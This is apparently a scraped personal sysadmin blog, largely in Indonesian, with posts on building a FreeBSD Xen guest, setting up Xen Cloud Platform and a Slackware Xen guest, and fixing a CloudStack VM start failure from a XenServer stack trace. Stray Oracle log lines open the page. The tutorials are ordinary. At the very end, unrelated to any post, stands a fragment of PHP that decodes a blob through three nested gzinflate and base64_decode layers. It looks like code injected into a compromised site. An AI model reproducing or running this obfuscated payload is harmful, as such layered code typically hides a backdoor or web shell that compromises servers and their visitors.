Java DB creation and initialization for Domain Model successful
configuring jobs db 
INFO: hd_jobs_vc_agent_db.sh decrypted the password.
Java DB creation and initialization for job manager successful
INFO: db decrypted the password.

ref: http://www.oracle.com/technetwork/oem/ops-center/index.html



FreeBSD XEN domU

  ozzie / 06/12/2012

create virtual image

# truncate -s 2048M freebsd.img

create virtual disk

# mdconfig -f freebsd.img
# fdisk -B md0
# bsdlabel -wB md0s1
# newfs -U md0s1a

mounting & build

# mount /dev/md0s1a /mnt
# csup -h freebsd.iconpln.net.id  -L 2 /usr/share/examples/cvsup/standard-supfile
# export MAKEOBJDIRPREFIX=/tmp/compile.source
# cd /usr/src
# make buildworld 
# make buildkernel KERNCONF=XEN
# export DESTDIR=/mnt
# make installworld 
# make installkernel KERNCONF=XEN 
# cd /usr/src/etc 
# make distribution

prepare untuk nanti booting virtual:
/mnt/etc/fstab

/dev/xbd0       /               ufs     rw              1       1

/mnt/etc/ttys

xc0     "/usr/libexec/getty Pc"         vt100   on  secure

copy hasil compile untuk pre kernel dom0

# cp /mnt/boot/kernel/kernel /some/place/freebsd-kernel

umount & destroy

# umount /mnt
# mdconfig -d -u md0


monitoring with Observium

  ozzie / 12/11/2012

dari sekian banyak aplikasi monitoring (web-based) { cacti | jffnms | mrtg | nagios | munin | monit | opennms| etc }
mungkin Observium lumayan cukup lengkap, lite & infomatif.. cmiiw :D

untuk proses instalasi relatif mudah.. cmiiw :D sekian.. segini dulu.. hihihi



Unable to start VM [cloudstack]

  ozzie / 02/11/2012

mungkin beberapa pesan error yg pernah dialami.. dengan banyaknya jumlah vm pada host-host cloudstack:

WARN  [xen.resource.CitrixResourceBase] (DirectAgent-318:null) Task failed! Task record:                 uuid: 7d57a198-339b-7588-9678-fcc9442d1a85
           nameLabel: Async.VM.start_on
     nameDescription: 
   allowedOperations: []
   currentOperations: {}
             created: Thu Nov 01 22:06:24 WIT 2012
            finished: Thu Nov 01 22:05:58 WIT 2012
              status: FAILURE
          residentOn: com.xensource.xenapi.Host@658287be
            progress: 1.0
                type: <none/>
              result: 
           errorInfo: [SR_BACKEND_FAILURE_46, , The VDI is not available [opterr=VDI 97e7ccc0-38de-4e80-b8ef-1aa4a2fb1c39 already attached RW]]
         otherConfig: {}
           subtaskOf: com.xensource.xenapi.Task@aaf13f6f
            subtasks: []
 
WARN  [xen.resource.CitrixResourceBase] (DirectAgent-318:null) Unable to start VM(i-2-37-VM) on host(42ee82e2-37ef-4f06-a142-13415e377e15) due to Task failed! Task record:                 uuid: 7d57a198-339b-7588-9678-fcc9442d1a85
           nameLabel: Async.VM.start_on
     nameDescription: 
   allowedOperations: []
   currentOperations: {}
             created: Thu Nov 01 22:06:24 WIT 2012
            finished: Thu Nov 01 22:05:58 WIT 2012
              status: FAILURE
          residentOn: com.xensource.xenapi.Host@658287be
            progress: 1.0
                type: <none/>
              result: 
           errorInfo: [SR_BACKEND_FAILURE_46, , The VDI is not available [opterr=VDI 97e7ccc0-38de-4e80-b8ef-1aa4a2fb1c39 already attached RW]]
         otherConfig: {}
           subtaskOf: com.xensource.xenapi.Task@aaf13f6f
            subtasks: []
 
Task failed! Task record:                 uuid: 7d57a198-339b-7588-9678-fcc9442d1a85
           nameLabel: Async.VM.start_on
     nameDescription: 
   allowedOperations: []
   currentOperations: {}
             created: Thu Nov 01 22:06:24 WIT 2012
            finished: Thu Nov 01 22:05:58 WIT 2012
              status: FAILURE
          residentOn: com.xensource.xenapi.Host@658287be
            progress: 1.0
                type: <none/>
              result: 
           errorInfo: [SR_BACKEND_FAILURE_46, , The VDI is not available [opterr=VDI 97e7ccc0-38de-4e80-b8ef-1aa4a2fb1c39 already attached RW]]
         otherConfig: {}
           subtaskOf: com.xensource.xenapi.Task@aaf13f6f
            subtasks: []
 
	at com.cloud.hypervisor.xen.resource.CitrixResourceBase.checkForSuccess(CitrixResourceBase.java:2768)
	at com.cloud.hypervisor.xen.resource.CitrixResourceBase.startVM(CitrixResourceBase.java:2880)
	at com.cloud.hypervisor.xen.resource.CitrixResourceBase.execute(CitrixResourceBase.java:1107)
	at com.cloud.hypervisor.xen.resource.CitrixResourceBase.executeRequest(CitrixResourceBase.java:466)
	at com.cloud.hypervisor.xen.resource.XenServer56Resource.executeRequest(XenServer56Resource.java:69)
	at com.cloud.agent.manager.DirectAgentAttache$Task.run(DirectAgentAttache.java:187)
	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:471)
	at java.util.concurrent.FutureTask$Sync.innerRun(FutureTask.java:334)
	at java.util.concurrent.FutureTask.run(FutureTask.java:166)
	at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$101(ScheduledThreadPoolExecutor.java:165)
	at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:266)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1110)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:603)
	at java.lang.Thread.run(Thread.java:679)

1. cek UUID & VM dgn XE VDI-LIST

xe vdi-list | grep -i <VM-NAME> -B2 -A2

2. buang virtual disk nya sesuai UUID:

xe vdi-forget uuid=<VDI-UUID>

3. scan SR:

xe sr-scan uuid=<SR-UUID>

4. start vm


semoga bermanfaat. :D



IaaS with CloudStack

  ozzie / 13/07/2012

cerita tentang membangun Cloud di beberapa kandang kebonbinatang.org.

awalnya memang kesulitan pada infrastruktur hadware..



Xen Cloud Platform

  ozzie / 16/02/2012

Download & Install XCP [http://xen.org/products/cloudxen.html]

xcp

create DISK LVM

#xe sr-create type=lvm content-type=user  
device-config:device=/dev/disk/by-id/cciss-part3    
name-label="local SR"

Create & Mount ISO reposity

# mkfs.ext3 /dev/sda2
# mkdir /mnt/iso
# mount /dev/sda2 /mnt/iso/
# xe-mount-iso-sr /mnt/iso/ -o bind

Download & Install Xencenter / OpenXenManager



Slackware guestOs @ XEN

  ozzie / 15/09/2011

sedikit dokumentasi hasil oprek2 Slackware sebagai Guest pada XEN.

Siapkan VirtualDisk, (contoh disini hanya 2GB & swap 512MB)

# mkdir -p /virtual/
# cd /virtual/
# dd if=/dev/zero of=/virtual/root0.img oflag=direct bs=1M seek=2047 count=1
# dd if=/dev/zero of=/virtual/swap0.img oflag=direct bs=1M seek=512 count=0

Download Pre-Build Kernel

wget http://blog.ozzie.web.id/pub/xen/kernel/vmlinOZ
wget http://kambing.ui.ac.id/slackware/slackware-13.37/isolinux/initrd.img

Create configuration: /etc/xen/darkstar.cfg

name = "darkstar"
memory = "128"
kernel = "/vmlinOZ"
ramdisk = "/initrd.img"
disk =['file:/virtual/root0.img,xvda,w','file:/virtual/swap0.img,xvdb,w' ,'file:/slackware-13.37-install-d1.iso,xvdc:cdrom,r']
vif = [ 'bridge=xenbr0,script=vif-bridge' ]
vcpus = "1"
extra = "load_ramdisk=1 prompt_ramdisk=0 rw"
extra = "root=/dev/xvda1 ro"

Jalankan Guest,

cd /etc/xen/
xm create darkstar -c

Lakukan Installasi seperti Biasa








".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>